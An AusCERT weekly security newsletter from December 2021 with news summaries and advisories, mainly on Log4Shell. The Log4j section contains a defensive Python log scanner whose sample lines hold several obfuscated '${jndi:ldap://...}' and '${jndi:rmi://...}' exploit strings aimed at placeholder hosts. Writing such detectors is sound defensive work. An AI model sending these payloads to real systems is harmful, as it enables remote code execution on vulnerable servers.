Week in review - 17 Dec 2021

AusCERT Week in Review for 17th December 2021


With only seven sleeps until Christmas, the realisation that the end of the year is upon us has well and truly set in!

A reminder of our scheduled shutdown over the Christmas and New Year period: AusCERT will be closed from Thursday, December 23rd until Monday, January 3rd 2022. We will reopen on Tuesday, January 4th 2022.

The auscert@auscert.org.au mailbox will not be monitored during this period. However, we will staff the 24/7 member incident hotline as usual; so do call us for any urgent matters during this period.

If you’re looking for something to do over the break, don’t forget the Call for Presentations for AusCERT2022 is OPEN! We’re looking for something unique, a great story or something new that can be shared with our attendees. The closing date for submissions is January 10th, so be sure to get your idea to our committee to ensure feedback can be provided by the final deadline of January 30th.

Also, AusCERT is hiring, so if you’re interested in infrastructure, putting together security solutions and working collaboratively with cyber security analysts, brush off your resume and send it to us over the break!

Something that we have been reminded of this past week with Log4j is that the world of cyber security doesn’t take holidays, and we must always remain vigilant.

A recent blog from Seriously Risky Business provides a great overview of the situation and suggests how future occurrences of similar incidents can be avoided.

Another blog post, this time from Rapid7, highlights how threat actors race to take advantage of large-scale vulnerabilities such as Log4j, often working just as hard as those trying to remediate them, but with the aim of exploiting the vulnerability.

As this is the last Week In Review before Christmas, and with a lot of folk switching off for a well-earned break, the team at AusCERT wanted to wish everyone a safe and happy Christmas and Festive Season and all the very best for 2022.

Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation
Date: 2021-12-11
Author: Microsoft Security Blog

[This article is focused on the use of Microsoft security products to mitigate exploits. See also ASB-2021.0244.2, published December 10.] Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, has been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”.
The vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component. For more technical and mitigation information about the vulnerability, please read the Microsoft Security Response Center blog.
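To make the "hunting" part of that guidance concrete: the input vector is any attacker-controlled string that ends up in a log message (a User-Agent, a URL parameter, a header), and the trigger is Log4j 2 evaluating the ${...} lookup inside it, which is the same mechanism ESB-2021.4192 describes further down. The scanner below is an added example written for this summary, not code from Microsoft, Apache or the Log4j project. It normalises the common obfuscation forms (${lower:x}, ${upper:x} and the ${key:-default} fallback, assuming the key is undefined on the target so the default is what gets substituted) before matching the jndi: pattern, and pulls out the callback host so it can be blocked at the egress. The log lines and the 203.0.113.x addresses are constructed for the example.

```python
"""Hunt for Log4Shell (CVE-2021-44228) lookup strings in request logs.

Log4j 2 evaluates ${...} lookups inside any string it logs. Attackers hide
the "jndi:" prefix behind other lookups (${lower:j}, ${::-j}, ${env:NOPE:-j}),
so a plain substring search for "jndi:" misses them. This example resolves
those obfuscation-only lookups first, then matches on the normalised text.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

# Constructed sample lines in Apache combined log format (not from a real
# system); 203.0.113.0/24 is an RFC 5737 documentation range.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:01:11 +0000] '
    '"GET /?x=${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.11:1099/b} HTTP/1.1" 404 12 "-" "curl/7.68.0"',
    '10.0.0.9 - - [11/Dec/2021:10:01:13 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//203.0.113.12/c}"',
    '10.0.0.7 - - [11/Dec/2021:10:01:15 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

# Innermost lookup: a ${...} whose body contains no further braces.
INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# After normalisation: ${jndi:<scheme>:<host[:port]>...}. Log4j lower-cases
# the lookup prefix, so the match is case-insensitive.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z][a-z0-9+.-]*):/*([^/\s}]+)", re.IGNORECASE)
# Lookup syntax that survived normalisation, e.g. ${env:PATH} or ${sys:user.home}.
RESIDUAL_LOOKUP = re.compile(r"\$\{[^}]*:[^}]*\}")


def _resolve_inner(match) -> str:
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return match.group(0)          # the thing we are hunting for: keep it intact
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${key:-default} / ${lookup:key:-default}. Assumption: the key is
        # undefined on the target, so the default (the payload fragment) is used.
        return body.split(":-", 1)[1]
    return match.group(0)              # ${date:...}, ${env:REAL}: cannot resolve offline


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested obfuscation lookups until the string stops changing."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve_inner, text)
        if resolved == text:
            break
        text = resolved
    return text


@dataclass(frozen=True)
class Finding:
    line_no: int
    severity: str            # "high": resolved JNDI lookup; "low": other lookup syntax
    scheme: Optional[str]    # ldap, rmi, dns, ...
    host: Optional[str]      # callback host[:port] the JVM would connect to
    normalized: str


def scan_line(line_no: int, line: str) -> Optional[Finding]:
    norm = normalize(line)
    m = JNDI_LOOKUP.search(norm)
    if m:
        return Finding(line_no, "high", m.group(1).lower(), m.group(2), norm)
    if RESIDUAL_LOOKUP.search(norm):
        return Finding(line_no, "low", None, None, norm)
    return None


def scan(lines: Iterable[str]) -> List[Finding]:
    return [f for f in (scan_line(i, l) for i, l in enumerate(lines, 1)) if f]


def callback_hosts(findings: Iterable[Finding]) -> Set[str]:
    """Hosts the payloads would reach out to: candidates for egress blocking."""
    return {f.host for f in findings if f.host}


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG_LINES)
    for f in hits:
        print(f"line {f.line_no}: {f.severity:4} {f.scheme or '-':5} {f.host or '-'}")
    print("callback hosts:", sorted(callback_hosts(hits)))
```

Two caveats worth keeping in mind when using something like this on real logs: a "low" finding only means lookup syntax was present, so a benign ${date:yyyy} in a path will show up alongside a genuine probe; and lookups this scanner cannot resolve offline (${env:...}, ${sys:...} with real keys) are left in place rather than guessed, which is why the high-severity match is done on the normalised string and not on the raw line. A ${jndi:...} body is deliberately never rewritten, so an attacker cannot hide it by appending a :-default suffix.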

Bugs in billions of WiFi, Bluetooth chips allow password, data theft
Date: 2021-12-13
Author: Bleeping Computer

Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves it’s possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device’s Bluetooth component.
Modern consumer electronic devices such as smartphones feature SoCs with separate Bluetooth, WiFi, and LTE components, each with its own dedicated security implementation.

Second Log4j vulnerability discovered, patch already released
Date: 2021-12-15
Author: ZDNet

A second vulnerability involving Apache Log4j was found on Tuesday after cybersecurity experts spent days attempting to patch or mitigate CVE-2021-44228.
The description of the new vulnerability, CVE-2021-45046, says the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was “incomplete in certain non-default configurations.”
“This could allow attackers… to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack,” the CVE description says.

Why Companies Shouldn’t Shame Employees Who Fall for Hacking Scams
Date: 2021-12-06
Author: Wall Street Journal

[This article may be behind a paywall for some readers] The implications of our survey were clear: Shame is similar to a boomerang that will come back to hurt the organization, as well as harming the employee. Managers should deal with the mistake, but not reject the employee. If employees feel that their personhood is being attacked, they will respond defensively. Shaming results in a lose-lose outcome.
Employees can be an organization’s greatest asset when it comes to defeating the efforts of cybercriminals. Using shame as a behavior modification tool squanders that potential. And that’s the real shame.

Google pushes emergency Chrome update to fix zero-day used in attacks
Date: 2021-12-13
Author: Bleeping Computer

Google has released Chrome 96.0.4664.110 for Windows, Mac, and Linux, to address a high-severity zero-day vulnerability exploited in the wild.
“Google is aware of reports that an exploit for CVE-2021-4102 exists in the wild,” the browser vendor said in today’s security advisory.
Although the company says this update may take some time to reach all users, Chrome 96.0.4664.110 has already begun rolling out worldwide in the Stable Desktop channel.

Actively Exploited Microsoft Zero-Day Allows App Spoofing, Malware Delivery
Date: 2021-12-14
Author: Threat Post

Microsoft has addressed a zero-day vulnerability that was exploited in the wild to deliver Emotet, Trickbot and more in the form of fake applications.
The patch came as part of the computing giant’s December Patch Tuesday update, which included a total of 67 fixes for security vulnerabilities. The patches cover the waterfront of Microsoft’s portfolio, affecting ASP.NET Core and Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (Chromium-based), Microsoft Office and Office Components, SharePoint Server, PowerShell, Remote Desktop Client, Windows Hyper-V, Windows Mobile Device Management, Windows Remote Access Connection Manager, TCP/IP, and the Windows Update Stack.

Australia to establish youth advisory council for countering online child exploitation
Date: 2021-12-15
Author: ZDnet

Australia will create a new panel consisting of Australian youths and young adults that will provide consultation to industry and government about how to approach regulating online platforms.
“Young people know better than anyone about the good, the bad and the plain ugly that exists in the online world,” Prime Minister Scott Morrison said. “They are the first generation of Australians to grow up living simultaneously in both the real and digital worlds, and they are always at the forefront of new technologies.”

Visa pilots enumeration attack prevention requirement in Australia
Date: 2021-12-15
Author: IT News

Visa has chosen Australia as the first country worldwide where all “e-commerce payment providers” must have botnet detection capabilities in place by October to mitigate the threat posed by enumeration attacks.
The payments giant said it could not fight a rise in enumeration attacks alone and needed the assistance of the entire payments ecosystem.

ESB-2021.4192 – apache-log4j2: Execute arbitrary code/commands – Remote/unauthenticated

An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

ESB-2021.4268 – Safari: Execute arbitrary code/commands – Remote with user interaction

Processing maliciously crafted web content may lead to arbitrary code execution in the Safari browser.

ASB-2021.0245 – ALERT Microsoft Windows: Multiple vulnerabilities

Microsoft has released its monthly security patch update, which resolves 38 vulnerabilities across its products.

ASB-2021.0252 – ALERT Microsoft Edge (Chromium-based): Multiple vulnerabilities

Microsoft addressed a Microsoft Edge (Chromium-based) remote code execution vulnerability in its latest update.

ASB-2021.0253 – Azure Products: Multiple vulnerabilities

Microsoft states: “Successful exploitation allows for arbitrary code execution in the targeted application.”

Stay safe, stay patched and Merry Christmas and a Happy New Year!

The AusCERT team